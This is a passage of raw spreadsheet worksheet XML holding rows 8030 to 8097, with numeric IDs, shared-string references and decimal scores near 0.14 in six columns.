      <c r="F8030" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="8031" ht="15.75" customHeight="1">
      <c r="A8031" s="1">
        <v>27774.0</v>
      </c>
      <c r="B8031" s="2">
        <v>2.3113671E7</v>
      </c>
      <c r="C8031" s="2" t="s">
        <v>7628</v>
      </c>
      <c r="D8031" s="2">
        <v>1.0</v>
      </c>
      <c r="E8031" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8031" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="8032" ht="15.75" customHeight="1">
      <c r="A8032" s="1">
        <v>28398.0</v>
      </c>
      <c r="B8032" s="2">
        <v>2.6268096E7</v>
      </c>
      <c r="C8032" s="2" t="s">
        <v>7629</v>
      </c>
      <c r="D8032" s="2">
        <v>1.0</v>
      </c>
      <c r="E8032" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8032" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="8033" ht="15.75" customHeight="1">
      <c r="A8033" s="1">
        <v>32288.0</v>
      </c>
      <c r="B8033" s="2">
        <v>5546227.0</v>
      </c>
      <c r="C8033" s="2" t="s">
        <v>7630</v>
      </c>
      <c r="D8033" s="2">
        <v>1.0</v>
      </c>
      <c r="E8033" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8033" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="8034" ht="15.75" customHeight="1">
      <c r="A8034" s="1">
        <v>1625.0</v>
      </c>
      <c r="B8034" s="2">
        <v>2.7921209E7</v>
      </c>
      <c r="C8034" s="2" t="s">
        <v>7631</v>
      </c>
      <c r="D8034" s="2">
        <v>1.0</v>
      </c>
      <c r="E8034" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8034" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="8035" ht="15.75" customHeight="1">
      <c r="A8035" s="1">
        <v>6173.0</v>
      </c>
      <c r="B8035" s="2">
        <v>4.7888146E7</v>
      </c>
      <c r="C8035" s="2" t="s">
        <v>7632</v>
      </c>
      <c r="D8035" s="2">
        <v>1.0</v>
      </c>
      <c r="E8035" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8035" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="8036" ht="15.75" customHeight="1">
      <c r="A8036" s="1">
        <v>7116.0</v>
      </c>
      <c r="B8036" s="2">
        <v>5.038896E7</v>
      </c>
      <c r="C8036" s="2" t="s">
        <v>7633</v>
      </c>
      <c r="D8036" s="2">
        <v>1.0</v>
      </c>
      <c r="E8036" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8036" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="8037" ht="15.75" customHeight="1">
      <c r="A8037" s="1">
        <v>12857.0</v>
      </c>
      <c r="B8037" s="2">
        <v>3.1870637E7</v>
      </c>
      <c r="C8037" s="2" t="s">
        <v>7634</v>
      </c>
      <c r="D8037" s="2">
        <v>1.0</v>
      </c>
      <c r="E8037" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8037" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="8038" ht="15.75" customHeight="1">
      <c r="A8038" s="1">
        <v>15730.0</v>
      </c>
      <c r="B8038" s="2">
        <v>4.4054709E7</v>
      </c>
      <c r="C8038" s="2" t="s">
        <v>7635</v>
      </c>
      <c r="D8038" s="2">
        <v>1.0</v>
      </c>
      <c r="E8038" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8038" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="8039" ht="15.75" customHeight="1">
      <c r="A8039" s="1">
        <v>16246.0</v>
      </c>
      <c r="B8039" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C8039" s="2" t="s">
        <v>7636</v>
      </c>
      <c r="D8039" s="2">
        <v>1.0</v>
      </c>
      <c r="E8039" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8039" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="8040" ht="15.75" customHeight="1">
      <c r="A8040" s="1">
        <v>21354.0</v>
      </c>
      <c r="B8040" s="2">
        <v>2.1355654E7</v>
      </c>
      <c r="C8040" s="2" t="s">
        <v>7637</v>
      </c>
      <c r="D8040" s="2">
        <v>1.0</v>
      </c>
      <c r="E8040" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8040" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="8041" ht="15.75" customHeight="1">
      <c r="A8041" s="1">
        <v>1900.0</v>
      </c>
      <c r="B8041" s="2">
        <v>2.9909521E7</v>
      </c>
      <c r="C8041" s="2" t="s">
        <v>7638</v>
      </c>
      <c r="D8041" s="2">
        <v>1.0</v>
      </c>
      <c r="E8041" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8041" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="8042" ht="15.75" customHeight="1">
      <c r="A8042" s="1">
        <v>14729.0</v>
      </c>
      <c r="B8042" s="2">
        <v>4.067518E7</v>
      </c>
      <c r="C8042" s="2" t="s">
        <v>7639</v>
      </c>
      <c r="D8042" s="2">
        <v>1.0</v>
      </c>
      <c r="E8042" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8042" s="2">
        <v>0.1431924882629108</v>
      </c>
    </row>
    <row r="8043" ht="15.75" customHeight="1">
      <c r="A8043" s="1">
        <v>9306.0</v>
      </c>
      <c r="B8043" s="2">
        <v>5.5566164E7</v>
      </c>
      <c r="C8043" s="2" t="s">
        <v>7640</v>
      </c>
      <c r="D8043" s="2">
        <v>1.0</v>
      </c>
      <c r="E8043" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8043" s="2">
        <v>0.1430041152263375</v>
      </c>
    </row>
    <row r="8044" ht="15.75" customHeight="1">
      <c r="A8044" s="1">
        <v>5973.0</v>
      </c>
      <c r="B8044" s="2">
        <v>4.7360924E7</v>
      </c>
      <c r="C8044" s="2" t="s">
        <v>7641</v>
      </c>
      <c r="D8044" s="2">
        <v>1.0</v>
      </c>
      <c r="E8044" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8044" s="2">
        <v>0.1427350427350428</v>
      </c>
    </row>
    <row r="8045" ht="15.75" customHeight="1">
      <c r="A8045" s="1">
        <v>506.0</v>
      </c>
      <c r="B8045" s="2">
        <v>1.8090588E7</v>
      </c>
      <c r="C8045" s="2" t="s">
        <v>7642</v>
      </c>
      <c r="D8045" s="2">
        <v>1.0</v>
      </c>
      <c r="E8045" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8045" s="2">
        <v>0.14272030651341</v>
      </c>
    </row>
    <row r="8046" ht="15.75" customHeight="1">
      <c r="A8046" s="1">
        <v>884.0</v>
      </c>
      <c r="B8046" s="2">
        <v>2.1962625E7</v>
      </c>
      <c r="C8046" s="2" t="s">
        <v>7643</v>
      </c>
      <c r="D8046" s="2">
        <v>1.0</v>
      </c>
      <c r="E8046" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8046" s="2">
        <v>0.14272030651341</v>
      </c>
    </row>
    <row r="8047" ht="15.75" customHeight="1">
      <c r="A8047" s="1">
        <v>4140.0</v>
      </c>
      <c r="B8047" s="2">
        <v>4.1399631E7</v>
      </c>
      <c r="C8047" s="2" t="s">
        <v>7644</v>
      </c>
      <c r="D8047" s="2">
        <v>1.0</v>
      </c>
      <c r="E8047" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8047" s="2">
        <v>0.14272030651341</v>
      </c>
    </row>
    <row r="8048" ht="15.75" customHeight="1">
      <c r="A8048" s="1">
        <v>19933.0</v>
      </c>
      <c r="B8048" s="2">
        <v>5.7434773E7</v>
      </c>
      <c r="C8048" s="2" t="s">
        <v>7645</v>
      </c>
      <c r="D8048" s="2">
        <v>1.0</v>
      </c>
      <c r="E8048" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8048" s="2">
        <v>0.14272030651341</v>
      </c>
    </row>
    <row r="8049" ht="15.75" customHeight="1">
      <c r="A8049" s="1">
        <v>11959.0</v>
      </c>
      <c r="B8049" s="2">
        <v>2.5595819E7</v>
      </c>
      <c r="C8049" s="2" t="s">
        <v>7646</v>
      </c>
      <c r="D8049" s="2">
        <v>1.0</v>
      </c>
      <c r="E8049" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8049" s="2">
        <v>0.1424242424242425</v>
      </c>
    </row>
    <row r="8050" ht="15.75" customHeight="1">
      <c r="A8050" s="1">
        <v>9823.0</v>
      </c>
      <c r="B8050" s="2">
        <v>5.6626803E7</v>
      </c>
      <c r="C8050" s="2" t="s">
        <v>7647</v>
      </c>
      <c r="D8050" s="2">
        <v>1.0</v>
      </c>
      <c r="E8050" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8050" s="2">
        <v>0.1419753086419754</v>
      </c>
    </row>
    <row r="8051" ht="15.75" customHeight="1">
      <c r="A8051" s="1">
        <v>1996.0</v>
      </c>
      <c r="B8051" s="2">
        <v>3.0564599E7</v>
      </c>
      <c r="C8051" s="2" t="s">
        <v>7648</v>
      </c>
      <c r="D8051" s="2">
        <v>1.0</v>
      </c>
      <c r="E8051" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8051" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="8052" ht="15.75" customHeight="1">
      <c r="A8052" s="1">
        <v>11840.0</v>
      </c>
      <c r="B8052" s="2">
        <v>2.4708978E7</v>
      </c>
      <c r="C8052" s="2" t="s">
        <v>7649</v>
      </c>
      <c r="D8052" s="2">
        <v>1.0</v>
      </c>
      <c r="E8052" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8052" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="8053" ht="15.75" customHeight="1">
      <c r="A8053" s="1">
        <v>1147.0</v>
      </c>
      <c r="B8053" s="2">
        <v>2.4352915E7</v>
      </c>
      <c r="C8053" s="2" t="s">
        <v>7650</v>
      </c>
      <c r="D8053" s="2">
        <v>1.0</v>
      </c>
      <c r="E8053" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8053" s="2">
        <v>0.1416666666666667</v>
      </c>
    </row>
    <row r="8054" ht="15.75" customHeight="1">
      <c r="A8054" s="1">
        <v>5479.0</v>
      </c>
      <c r="B8054" s="2">
        <v>4.5726974E7</v>
      </c>
      <c r="C8054" s="2" t="s">
        <v>7651</v>
      </c>
      <c r="D8054" s="2">
        <v>1.0</v>
      </c>
      <c r="E8054" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8054" s="2">
        <v>0.1416666666666667</v>
      </c>
    </row>
    <row r="8055" ht="15.75" customHeight="1">
      <c r="A8055" s="1">
        <v>21410.0</v>
      </c>
      <c r="B8055" s="2">
        <v>2.1978976E7</v>
      </c>
      <c r="C8055" s="2" t="s">
        <v>7652</v>
      </c>
      <c r="D8055" s="2">
        <v>1.0</v>
      </c>
      <c r="E8055" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8055" s="2">
        <v>0.1416666666666667</v>
      </c>
    </row>
    <row r="8056" ht="15.75" customHeight="1">
      <c r="A8056" s="1">
        <v>6985.0</v>
      </c>
      <c r="B8056" s="2">
        <v>5.0047829E7</v>
      </c>
      <c r="C8056" s="2" t="s">
        <v>7653</v>
      </c>
      <c r="D8056" s="2">
        <v>1.0</v>
      </c>
      <c r="E8056" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8056" s="2">
        <v>0.1416275430359938</v>
      </c>
    </row>
    <row r="8057" ht="15.75" customHeight="1">
      <c r="A8057" s="1">
        <v>382.0</v>
      </c>
      <c r="B8057" s="2">
        <v>1.6369257E7</v>
      </c>
      <c r="C8057" s="2" t="s">
        <v>7654</v>
      </c>
      <c r="D8057" s="2">
        <v>1.0</v>
      </c>
      <c r="E8057" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8057" s="2">
        <v>0.1414930555555556</v>
      </c>
    </row>
    <row r="8058" ht="15.75" customHeight="1">
      <c r="A8058" s="1">
        <v>10768.0</v>
      </c>
      <c r="B8058" s="2">
        <v>1.559919E7</v>
      </c>
      <c r="C8058" s="2" t="s">
        <v>7655</v>
      </c>
      <c r="D8058" s="2">
        <v>1.0</v>
      </c>
      <c r="E8058" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8058" s="2">
        <v>0.1414930555555556</v>
      </c>
    </row>
    <row r="8059" ht="15.75" customHeight="1">
      <c r="A8059" s="1">
        <v>13712.0</v>
      </c>
      <c r="B8059" s="2">
        <v>3.6231188E7</v>
      </c>
      <c r="C8059" s="2" t="s">
        <v>7656</v>
      </c>
      <c r="D8059" s="2">
        <v>1.0</v>
      </c>
      <c r="E8059" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8059" s="2">
        <v>0.1414930555555556</v>
      </c>
    </row>
    <row r="8060" ht="15.75" customHeight="1">
      <c r="A8060" s="1">
        <v>31977.0</v>
      </c>
      <c r="B8060" s="2">
        <v>5319104.0</v>
      </c>
      <c r="C8060" s="2" t="s">
        <v>7657</v>
      </c>
      <c r="D8060" s="2">
        <v>1.0</v>
      </c>
      <c r="E8060" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8060" s="2">
        <v>0.1413398692810458</v>
      </c>
    </row>
    <row r="8061" ht="15.75" customHeight="1">
      <c r="A8061" s="1">
        <v>101.0</v>
      </c>
      <c r="B8061" s="2">
        <v>1.2646278E7</v>
      </c>
      <c r="C8061" s="2" t="s">
        <v>7658</v>
      </c>
      <c r="D8061" s="2">
        <v>1.0</v>
      </c>
      <c r="E8061" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8061" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="8062" ht="15.75" customHeight="1">
      <c r="A8062" s="1">
        <v>2970.0</v>
      </c>
      <c r="B8062" s="2">
        <v>3.6084057E7</v>
      </c>
      <c r="C8062" s="2" t="s">
        <v>7659</v>
      </c>
      <c r="D8062" s="2">
        <v>1.0</v>
      </c>
      <c r="E8062" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8062" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="8063" ht="15.75" customHeight="1">
      <c r="A8063" s="1">
        <v>6597.0</v>
      </c>
      <c r="B8063" s="2">
        <v>4.9012044E7</v>
      </c>
      <c r="C8063" s="2" t="s">
        <v>7660</v>
      </c>
      <c r="D8063" s="2">
        <v>1.0</v>
      </c>
      <c r="E8063" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8063" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="8064" ht="15.75" customHeight="1">
      <c r="A8064" s="1">
        <v>7099.0</v>
      </c>
      <c r="B8064" s="2">
        <v>5.0344047E7</v>
      </c>
      <c r="C8064" s="2" t="s">
        <v>7661</v>
      </c>
      <c r="D8064" s="2">
        <v>1.0</v>
      </c>
      <c r="E8064" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8064" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="8065" ht="15.75" customHeight="1">
      <c r="A8065" s="1">
        <v>13883.0</v>
      </c>
      <c r="B8065" s="2">
        <v>3.7006532E7</v>
      </c>
      <c r="C8065" s="2" t="s">
        <v>7662</v>
      </c>
      <c r="D8065" s="2">
        <v>1.0</v>
      </c>
      <c r="E8065" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8065" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="8066" ht="15.75" customHeight="1">
      <c r="A8066" s="1">
        <v>33264.0</v>
      </c>
      <c r="B8066" s="2">
        <v>7361667.0</v>
      </c>
      <c r="C8066" s="2" t="s">
        <v>7663</v>
      </c>
      <c r="D8066" s="2">
        <v>1.0</v>
      </c>
      <c r="E8066" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8066" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="8067" ht="15.75" customHeight="1">
      <c r="A8067" s="1">
        <v>12627.0</v>
      </c>
      <c r="B8067" s="2">
        <v>3.0238064E7</v>
      </c>
      <c r="C8067" s="2" t="s">
        <v>7664</v>
      </c>
      <c r="D8067" s="2">
        <v>1.0</v>
      </c>
      <c r="E8067" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8067" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="8068" ht="15.75" customHeight="1">
      <c r="A8068" s="1">
        <v>26386.0</v>
      </c>
      <c r="B8068" s="2">
        <v>1.6999988E7</v>
      </c>
      <c r="C8068" s="2" t="s">
        <v>7665</v>
      </c>
      <c r="D8068" s="2">
        <v>1.0</v>
      </c>
      <c r="E8068" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8068" s="2">
        <v>0.140901771336554</v>
      </c>
    </row>
    <row r="8069" ht="15.75" customHeight="1">
      <c r="A8069" s="1">
        <v>207.0</v>
      </c>
      <c r="B8069" s="2">
        <v>1.455519E7</v>
      </c>
      <c r="C8069" s="2" t="s">
        <v>7666</v>
      </c>
      <c r="D8069" s="2">
        <v>1.0</v>
      </c>
      <c r="E8069" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8069" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="8070" ht="15.75" customHeight="1">
      <c r="A8070" s="1">
        <v>1680.0</v>
      </c>
      <c r="B8070" s="2">
        <v>2.8389117E7</v>
      </c>
      <c r="C8070" s="2" t="s">
        <v>7667</v>
      </c>
      <c r="D8070" s="2">
        <v>1.0</v>
      </c>
      <c r="E8070" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8070" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="8071" ht="15.75" customHeight="1">
      <c r="A8071" s="1">
        <v>3600.0</v>
      </c>
      <c r="B8071" s="2">
        <v>3.9085279E7</v>
      </c>
      <c r="C8071" s="2" t="s">
        <v>7668</v>
      </c>
      <c r="D8071" s="2">
        <v>1.0</v>
      </c>
      <c r="E8071" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8071" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="8072" ht="15.75" customHeight="1">
      <c r="A8072" s="1">
        <v>4443.0</v>
      </c>
      <c r="B8072" s="2">
        <v>4.2389538E7</v>
      </c>
      <c r="C8072" s="2" t="s">
        <v>7669</v>
      </c>
      <c r="D8072" s="2">
        <v>1.0</v>
      </c>
      <c r="E8072" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8072" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="8073" ht="15.75" customHeight="1">
      <c r="A8073" s="1">
        <v>6437.0</v>
      </c>
      <c r="B8073" s="2">
        <v>4.8589915E7</v>
      </c>
      <c r="C8073" s="2" t="s">
        <v>7670</v>
      </c>
      <c r="D8073" s="2">
        <v>1.0</v>
      </c>
      <c r="E8073" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8073" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="8074" ht="15.75" customHeight="1">
      <c r="A8074" s="1">
        <v>6441.0</v>
      </c>
      <c r="B8074" s="2">
        <v>4.8589915E7</v>
      </c>
      <c r="C8074" s="2" t="s">
        <v>7671</v>
      </c>
      <c r="D8074" s="2">
        <v>1.0</v>
      </c>
      <c r="E8074" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8074" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="8075" ht="15.75" customHeight="1">
      <c r="A8075" s="1">
        <v>10136.0</v>
      </c>
      <c r="B8075" s="2">
        <v>5.7302655E7</v>
      </c>
      <c r="C8075" s="2" t="s">
        <v>7672</v>
      </c>
      <c r="D8075" s="2">
        <v>1.0</v>
      </c>
      <c r="E8075" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8075" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="8076" ht="15.75" customHeight="1">
      <c r="A8076" s="1">
        <v>14344.0</v>
      </c>
      <c r="B8076" s="2">
        <v>3.8860167E7</v>
      </c>
      <c r="C8076" s="2" t="s">
        <v>7673</v>
      </c>
      <c r="D8076" s="2">
        <v>1.0</v>
      </c>
      <c r="E8076" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8076" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="8077" ht="15.75" customHeight="1">
      <c r="A8077" s="1">
        <v>16513.0</v>
      </c>
      <c r="B8077" s="2">
        <v>4.661876E7</v>
      </c>
      <c r="C8077" s="2" t="s">
        <v>7674</v>
      </c>
      <c r="D8077" s="2">
        <v>1.0</v>
      </c>
      <c r="E8077" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8077" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="8078" ht="15.75" customHeight="1">
      <c r="A8078" s="1">
        <v>16965.0</v>
      </c>
      <c r="B8078" s="2">
        <v>4.8262001E7</v>
      </c>
      <c r="C8078" s="2" t="s">
        <v>7675</v>
      </c>
      <c r="D8078" s="2">
        <v>1.0</v>
      </c>
      <c r="E8078" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8078" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="8079" ht="15.75" customHeight="1">
      <c r="A8079" s="1">
        <v>17248.0</v>
      </c>
      <c r="B8079" s="2">
        <v>4.9091549E7</v>
      </c>
      <c r="C8079" s="2" t="s">
        <v>7676</v>
      </c>
      <c r="D8079" s="2">
        <v>1.0</v>
      </c>
      <c r="E8079" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8079" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="8080" ht="15.75" customHeight="1">
      <c r="A8080" s="1">
        <v>22020.0</v>
      </c>
      <c r="B8080" s="2">
        <v>2.9993246E7</v>
      </c>
      <c r="C8080" s="2" t="s">
        <v>7677</v>
      </c>
      <c r="D8080" s="2">
        <v>1.0</v>
      </c>
      <c r="E8080" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8080" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="8081" ht="15.75" customHeight="1">
      <c r="A8081" s="1">
        <v>6440.0</v>
      </c>
      <c r="B8081" s="2">
        <v>4.8589915E7</v>
      </c>
      <c r="C8081" s="2" t="s">
        <v>7670</v>
      </c>
      <c r="D8081" s="2">
        <v>1.0</v>
      </c>
      <c r="E8081" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8081" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="8082" ht="15.75" customHeight="1">
      <c r="A8082" s="1">
        <v>269.0</v>
      </c>
      <c r="B8082" s="2">
        <v>1.5253326E7</v>
      </c>
      <c r="C8082" s="2" t="s">
        <v>7678</v>
      </c>
      <c r="D8082" s="2">
        <v>1.0</v>
      </c>
      <c r="E8082" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8082" s="2">
        <v>0.1404040404040404</v>
      </c>
    </row>
    <row r="8083" ht="15.75" customHeight="1">
      <c r="A8083" s="1">
        <v>11634.0</v>
      </c>
      <c r="B8083" s="2">
        <v>2.3173143E7</v>
      </c>
      <c r="C8083" s="2" t="s">
        <v>7679</v>
      </c>
      <c r="D8083" s="2">
        <v>1.0</v>
      </c>
      <c r="E8083" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8083" s="2">
        <v>0.1404040404040404</v>
      </c>
    </row>
    <row r="8084" ht="15.75" customHeight="1">
      <c r="A8084" s="1">
        <v>33136.0</v>
      </c>
      <c r="B8084" s="2">
        <v>7065764.0</v>
      </c>
      <c r="C8084" s="2" t="s">
        <v>7680</v>
      </c>
      <c r="D8084" s="2">
        <v>1.0</v>
      </c>
      <c r="E8084" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8084" s="2">
        <v>0.1404040404040404</v>
      </c>
    </row>
    <row r="8085" ht="15.75" customHeight="1">
      <c r="A8085" s="1">
        <v>3322.0</v>
      </c>
      <c r="B8085" s="2">
        <v>3.7652122E7</v>
      </c>
      <c r="C8085" s="2" t="s">
        <v>7681</v>
      </c>
      <c r="D8085" s="2">
        <v>1.0</v>
      </c>
      <c r="E8085" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8085" s="2">
        <v>0.14030131826742</v>
      </c>
    </row>
    <row r="8086" ht="15.75" customHeight="1">
      <c r="A8086" s="1">
        <v>3477.0</v>
      </c>
      <c r="B8086" s="2">
        <v>3.8392161E7</v>
      </c>
      <c r="C8086" s="2" t="s">
        <v>7682</v>
      </c>
      <c r="D8086" s="2">
        <v>1.0</v>
      </c>
      <c r="E8086" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8086" s="2">
        <v>0.1402116402116403</v>
      </c>
    </row>
    <row r="8087" ht="15.75" customHeight="1">
      <c r="A8087" s="1">
        <v>381.0</v>
      </c>
      <c r="B8087" s="2">
        <v>1.6329069E7</v>
      </c>
      <c r="C8087" s="2" t="s">
        <v>7683</v>
      </c>
      <c r="D8087" s="2">
        <v>1.0</v>
      </c>
      <c r="E8087" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8087" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="8088" ht="15.75" customHeight="1">
      <c r="A8088" s="1">
        <v>15117.0</v>
      </c>
      <c r="B8088" s="2">
        <v>4.1880091E7</v>
      </c>
      <c r="C8088" s="2" t="s">
        <v>7684</v>
      </c>
      <c r="D8088" s="2">
        <v>1.0</v>
      </c>
      <c r="E8088" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8088" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="8089" ht="15.75" customHeight="1">
      <c r="A8089" s="1">
        <v>5820.0</v>
      </c>
      <c r="B8089" s="2">
        <v>4.6861251E7</v>
      </c>
      <c r="C8089" s="2" t="s">
        <v>7685</v>
      </c>
      <c r="D8089" s="2">
        <v>1.0</v>
      </c>
      <c r="E8089" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8089" s="2">
        <v>0.1398467432950192</v>
      </c>
    </row>
    <row r="8090" ht="15.75" customHeight="1">
      <c r="A8090" s="1">
        <v>10284.0</v>
      </c>
      <c r="B8090" s="2">
        <v>5.7635935E7</v>
      </c>
      <c r="C8090" s="2" t="s">
        <v>7686</v>
      </c>
      <c r="D8090" s="2">
        <v>1.0</v>
      </c>
      <c r="E8090" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8090" s="2">
        <v>0.1398148148148149</v>
      </c>
    </row>
    <row r="8091" ht="15.75" customHeight="1">
      <c r="A8091" s="1">
        <v>13640.0</v>
      </c>
      <c r="B8091" s="2">
        <v>3.5911928E7</v>
      </c>
      <c r="C8091" s="2" t="s">
        <v>7687</v>
      </c>
      <c r="D8091" s="2">
        <v>1.0</v>
      </c>
      <c r="E8091" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8091" s="2">
        <v>0.1398148148148148</v>
      </c>
    </row>
    <row r="8092" ht="15.75" customHeight="1">
      <c r="A8092" s="1">
        <v>16123.0</v>
      </c>
      <c r="B8092" s="2">
        <v>4.5490591E7</v>
      </c>
      <c r="C8092" s="2" t="s">
        <v>7688</v>
      </c>
      <c r="D8092" s="2">
        <v>1.0</v>
      </c>
      <c r="E8092" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8092" s="2">
        <v>0.1398148148148148</v>
      </c>
    </row>
    <row r="8093" ht="15.75" customHeight="1">
      <c r="A8093" s="1">
        <v>31485.0</v>
      </c>
      <c r="B8093" s="2">
        <v>5050644.0</v>
      </c>
      <c r="C8093" s="2" t="s">
        <v>7689</v>
      </c>
      <c r="D8093" s="2">
        <v>1.0</v>
      </c>
      <c r="E8093" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8093" s="2">
        <v>0.1397058823529412</v>
      </c>
    </row>
    <row r="8094" ht="15.75" customHeight="1">
      <c r="A8094" s="1">
        <v>3910.0</v>
      </c>
      <c r="B8094" s="2">
        <v>4.0498666E7</v>
      </c>
      <c r="C8094" s="2" t="s">
        <v>7690</v>
      </c>
      <c r="D8094" s="2">
        <v>1.0</v>
      </c>
      <c r="E8094" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8094" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="8095" ht="15.75" customHeight="1">
      <c r="A8095" s="1">
        <v>8173.0</v>
      </c>
      <c r="B8095" s="2">
        <v>5.3236404E7</v>
      </c>
      <c r="C8095" s="2" t="s">
        <v>7691</v>
      </c>
      <c r="D8095" s="2">
        <v>1.0</v>
      </c>
      <c r="E8095" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8095" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="8096" ht="15.75" customHeight="1">
      <c r="A8096" s="1">
        <v>584.0</v>
      </c>
      <c r="B8096" s="2">
        <v>1.9134354E7</v>
      </c>
      <c r="C8096" s="2" t="s">
        <v>7692</v>
      </c>
      <c r="D8096" s="2">
        <v>1.0</v>
      </c>
      <c r="E8096" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8096" s="2">
        <v>0.139344262295082</v>
      </c>
    </row>
    <row r="8097" ht="15.75" customHeight="1">
      <c r="A8097" s="1">
        <v>32972.0</v>
      </c>
      <c r="B8097" s="2">
        <v>6550675.0</v>
      </c>
      <c r="C8097" s="2" t="s">
        <v>7693</v>
      </c>
      <c r="D8097" s="2">
        <v>1.0</v>
      </c>
      <c r="E8097" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8097" s="2">
